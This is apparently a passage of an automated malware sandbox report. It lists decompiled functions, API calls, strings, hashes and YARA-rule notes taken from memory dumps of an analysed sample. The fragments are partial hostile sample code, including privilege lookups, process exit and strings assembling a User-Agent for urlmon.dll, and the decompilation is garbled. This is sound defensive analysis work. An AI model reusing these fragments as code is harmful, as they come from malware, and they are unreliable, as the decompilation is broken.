Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFC9B

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFC6B

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFDCB

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFD9A

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFEDB

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFEAB

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 00DFFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00DFFFBF

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 00409A80, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409A80(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a8b
0x00409a93
0x00409a95
0x00409a9a
0x00409a9f
0x00409ab2
0x00409ab7
0x00409ac0
0x00409acc
0x00409adf
0x00409ae4
0x00409ae7
0x00409af0
0x00409b02
0x00409b07
0x00409b0c
0x00000000
0x00000000
0x00409b0e
0x00409b12
0x00000000
0x00000000
0x00409b14
0x00000000
0x00409b12
0x00409b16
0x00409b19
0x00409b1f
0x00409b21
0x00409b2c
0x00409b31
0x00409b34
0x00409b41
0x00409b4c
0x00409b4e
0x00409b54
0x00409b58
0x00409b5b
0x00409b5b
0x00409b62
0x00409b65
0x00409b6a
0x00409b77
0x00409aa6
0x00409aa6
0x00409aa6

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D

Strings

oLA, xrefs: 0041A03C, 0041A048

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A054, Relevance: 3.0, APIs: 2, Instructions: 50
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041A054(void* __eax, void* __ebx, void* __ecx, void* _a4, long _a8, void* _a12) {
				intOrPtr _v0;
				char _t14;
				void* _t23;
				void* _t24;

				asm("std");
				asm("loop 0x3b");
				_t4 = _v0 + 0xc74; // 0xc74
				E0041A950(_t23, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35, _t24);
				_t14 = RtlFreeHeap(_a4, _a8, _a12); // executed
				return _t14;
			}

0x0041a05d
0x0041a05e
0x0041a06f
0x0041a077
0x0041a08d
0x0041a091

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 7852e3408f08d7e80afe27349c58d6811e91e7e86c1d0d8a92ebb3a18b1cb4bb
Instruction ID: 314e6a0a069369600918045beec7d1aae0f914b2b8a6b632052c634c8b04dcf3
Opcode Fuzzy Hash: 7852e3408f08d7e80afe27349c58d6811e91e7e86c1d0d8a92ebb3a18b1cb4bb
Instruction Fuzzy Hash: 4D019AB5640204BFD724DF68CC86EE73BACAF88350F018569B91DAB242C630E910CAE1

Uniqueness

Uniqueness Score: -1.00%

Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 61
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E004082E8(void* __eax, void* __ebx, signed int __edx, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t14;
				int _t15;
				long _t25;
				int _t30;
				void* _t33;
				void* _t35;
				signed int _t40;

				_pop(ss);
				asm("popad");
				asm("int3");
				asm("outsd");
				asm("insd");
				_t40 = __edx ^  *(__ebx + 0x55);
				_t33 = _t35;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t14 = E0040ACC0(_t40, _a4 + 0x1c,  &_v68); // executed
				_t15 = E00414E10(_a4 + 0x1c, _t14, 0, 0, 0xc4e7b6d6);
				_t30 = _t15;
				if(_t30 != 0) {
					_t25 = _a8;
					_t15 = PostThreadMessageW(_t25, 0x111, 0, 0); // executed
					_t42 = _t15;
					if(_t15 == 0) {
						_t15 =  *_t30(_t25, 0x8003, _t33 + (E0040A450(_t42, 1, 8) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}

0x004082e8
0x004082e9
0x004082eb
0x004082ec
0x004082ed
0x004082ee
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: c20792116d28761ced50f241288bb5f84e97ffdee857dc8ed29676c29d871da7
Instruction ID: 141a0ee6367241d044485ea6d51907c9f25dcc324f7b39f93d545249feb70ced
Opcode Fuzzy Hash: c20792116d28761ced50f241288bb5f84e97ffdee857dc8ed29676c29d871da7
Instruction Fuzzy Hash: 8401DD31A802187BE720A6A59D43FFF772CAB41F54F14411DFF04BA2C2D6A8691546E6

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1B1, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041A1B1(void* __eax, char __ebx, intOrPtr _a8, WCHAR* _a12, WCHAR* _a16, struct _LUID* _a20) {
				char _v113;
				int _t14;
				void* _t21;
				void* _t22;

				_v113 = __ebx;
				goto L1;
				asm("fst dword [ecx]");
				_pop(_t21);
				_push(0xfb73af11);
				E0041A950(_t21, _a8, _a8 + 0xc8c,  *((intOrPtr*)(_a8 + 0xa18)), 0, 0x46, _t22);
				_t14 = LookupPrivilegeValueW(_a12, _a16, _a20); // executed
				return _t14;
				L1:
			}

0x0041a1b1
0x0041a1b4
0x0041a1bb
0x0041a1bd
0x0041a1c0
0x0041a1da
0x0041a1f0
0x0041a1f4
0x0041a1b6

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 3cdce3a1ecde6bf39dce3a616fa9d2d923750d7c28cff0e634a39f5f6524094f
Instruction ID: feced6c3589f8f99bb02b73180dca4859bcc1a06c4623fae62d381f2a689b0f8
Opcode Fuzzy Hash: 3cdce3a1ecde6bf39dce3a616fa9d2d923750d7c28cff0e634a39f5f6524094f
Instruction Fuzzy Hash: 04F055B02082046BCB10EF58DC42EEB3BA8EF41320F18499EF89D1B203C638D41587BA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A093, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041A093() {
				int _v0;
				intOrPtr _v4;
				void* _v117;
				void* _t16;
				void* _t20;
				void* _t21;

				 *((intOrPtr*)(_t16 + 0x67)) =  *((intOrPtr*)(_t16 + 0x67)) - _t16;
				_push(_t21);
				_push(cs);
				asm("repe mov [edi-0x65], esp");
				E0041A950(_t20, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_v4 + 0xa14)), 0, 0x36, _t21);
				ExitProcess(_v0);
			}

0x0041a095
0x0041a098
0x0041a09a
0x0041a09b
0x0041a0ba
0x0041a0c8

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a640e4b57257df6022a08fb8c7dadda29959b923f20587d2a8052c42d80c7ea8
Instruction ID: 6bb3da4b081dcdad50b1747e060fa64b1872167f5eed0151c9e67b4fd35c9b9d
Opcode Fuzzy Hash: a640e4b57257df6022a08fb8c7dadda29959b923f20587d2a8052c42d80c7ea8
Instruction Fuzzy Hash: 45E04F71501301BFD724DF64CC8AEE77BA8EF4A350F11846EBD5DAB242D231A612CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;
				void* _t11;

				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
				ExitProcess(_a8);
			}

0x0041a0ba
0x0041a0c8

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004172D3, Relevance: 6.3, Strings: 5, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004172D3(signed int __eax, intOrPtr* __ebx, void* __edi) {
				void* _t10;

				asm("out 0x0, eax");
				 *__ebx =  *__ebx + _t10;
				asm("loop 0x2c");
				return __eax ^ 0xe60c8bb8;
			}

0x004172d5
0x004172dd
0x004172e0
0x004172ec

Strings

Us, xrefs: 00417329
gent, xrefs: 00417337
er-A, xrefs: 00417330
urlmon.dll, xrefs: 0041734D, 00417350
: , xrefs: 0041733E

Memory Dump Source

Source File: 00000005.00000002.2192765767.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: Us$: $er-A$gent$urlmon.dll
API String ID: 0-1367105278
Opcode ID: 4aa0a1b785c40d99cf04ddc8cde1a4e5426be87cdc6271da11ba6cafad3f64e1
Instruction ID: b8a4ebf0f7673431978adb552c80927709b78855b1a34c17fb067f78a6dc3c79
Opcode Fuzzy Hash: 4aa0a1b785c40d99cf04ddc8cde1a4e5426be87cdc6271da11ba6cafad3f64e1
Instruction Fuzzy Hash: 5811C2B2E012196BEB11DF92DC02BFEBB74EB41754F11009AEC04BB241D3395A42C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 00E126F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2192980870.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000005.00000002.2192976975.0000000000DE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193038356.0000000000ED0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193042325.0000000000EE0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193046369.0000000000EE4000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193050264.0000000000EE7000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193053891.0000000000EF0000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.2193079843.0000000000F50000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: cd575b0b51eb8448d954186ab15b5253b91693d5242f310ad6ba7ed92863cf90
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: CFF022303241499BDB08EA188D616FB33D5EB94304F58E03EEE49D7281E631DD90C290

Uniqueness

Uniqueness Score: -1.00%

Function 00416C8C, Relevance: .0, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00416C8C(intOrPtr* __eax, void* __ecx, void* __edx, void* __esi, void* _a1, char _a12, char _a16, void* _a87, intOrPtr _a10237115) {
				char _v1;
				char _v4;
				char _v8;
				char _v10;
				short _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t53;
				void* _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t61;
				intOrPtr _t65;
				void* _t73;
				char* _t78;
				void* _t82;
